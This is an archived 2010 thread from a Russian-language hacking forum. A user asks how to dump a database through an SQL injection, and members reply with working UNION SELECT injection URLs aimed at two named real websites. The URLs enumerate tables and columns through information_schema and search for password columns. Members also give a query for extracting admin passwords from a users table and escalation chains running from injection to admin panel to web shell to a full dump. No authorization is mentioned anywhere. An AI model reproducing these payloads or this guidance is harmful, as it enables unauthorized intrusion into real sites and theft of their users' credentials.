ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

25.06.2010, 23:02
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 10
Провел на форуме: 178004
Репутация:
0
|
|
Подскажите плз как слить бд
|
|
|

25.06.2010, 23:04
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Алкорайдер
Подскажите плз как слить бд
тебя посадят
а может скажешь что есть под рукой? шелл/админка/ и тп..или ничего? )
|
|
|

25.06.2010, 23:07
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
Сообщение от Konqi
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,3,4,5,GrOuP_CoNcAt(TaBlE_NaMe ),7,8,9+from+information_schema.columns--
вывод в title
вообщет ето не таблички...
title необязательно,так удобнее..
спс.
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,GrOuP_CoNcAt%28TaBlE_NaMe%20% 29,4,5,6,7,8,9+from+information_schema.tables--
|
|
|

25.06.2010, 23:11
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 10
Провел на форуме: 178004
Репутация:
0
|
|
Сообщение от Konqi
тебя посадят
а может скажешь что есть под рукой? шелл/админка/ и тп..или ничего? )
Врятли
Ничего, только sql-inj, но какбы там база огромная, поэтому хочу как-нибудь слить бд
|
|
|

25.06.2010, 23:12
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от 547
вообщет ето не таблички...
title необязательно,так удобнее..
спс.
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,GrOuP_CoNcAt%28TaBlE_NaMe%20% 29,4,5,6,7,8,9+from+information_schema.tables--
man я просто подумал что там фильтр на information_schema.tables поэтому сделал выборку из columns
|
|
|

25.06.2010, 23:15
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Алкорайдер
Врятли
Ничего, только sql-inj, но какбы там база огромная, поэтому хочу как-нибудь слить бд
инъекция->админка->shell->дамп
или
инъекция->shell->дамп
|
|
|

25.06.2010, 23:23
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме: 866555
Репутация:
226
|
|
Сообщение от Konqi
инъекция->админка->shell->дамп
или
инъекция->shell->дамп
инъекция->дамп (долго но можно=) )
|
|
|

25.06.2010, 23:31
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 10
Провел на форуме: 178004
Репутация:
0
|
|
Я немного не правильно выразился
Почти 1к БД, нужно как-то это всё слить и разобраться где там таблица с админскими пассами, т.к через inject там шелл не получается залить
вот примерно так всё это выглядит, половина БД пустые
|
|
|

26.06.2010, 00:42
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от Алкорайдер
Я немного не правильно выразился
Почти 1к БД, нужно как-то это всё слить и разобраться где там таблица с админскими пассами, т.к через inject там шелл не получается залить
вот
примерно так всё это выглядит, половина БД пустые
сделай запрос на вывод по другому..если админы в той же табелке что и обычные юзвери они отличаются статусом, левелом .попробуй что то типа : www.site.ru/news.php?id=[sql]+union+select+1,2,3,password+from+users+where+user _level=1--
ну или что то наподобее этого, все зависит от данных в твоей табличке с аккаунтами
|
|
|

26.06.2010, 01:56
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме: 947074
Репутация:
257
|
|
Алкорайдер. В следующий раз делай скрин как, "черный квадрат малевича" ..
Как вариат, ищи вручную...
http://www.mynhw.co.uk/news-full.php?id=-644+UNION+SELECT+1,2,group_concat(table_name,0x3a, column_name),4,5,6,7,8,9,10,11,12,13+from+informat ion_schema.columns+where+column_name+like+0x257061 737325
Я халосий
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|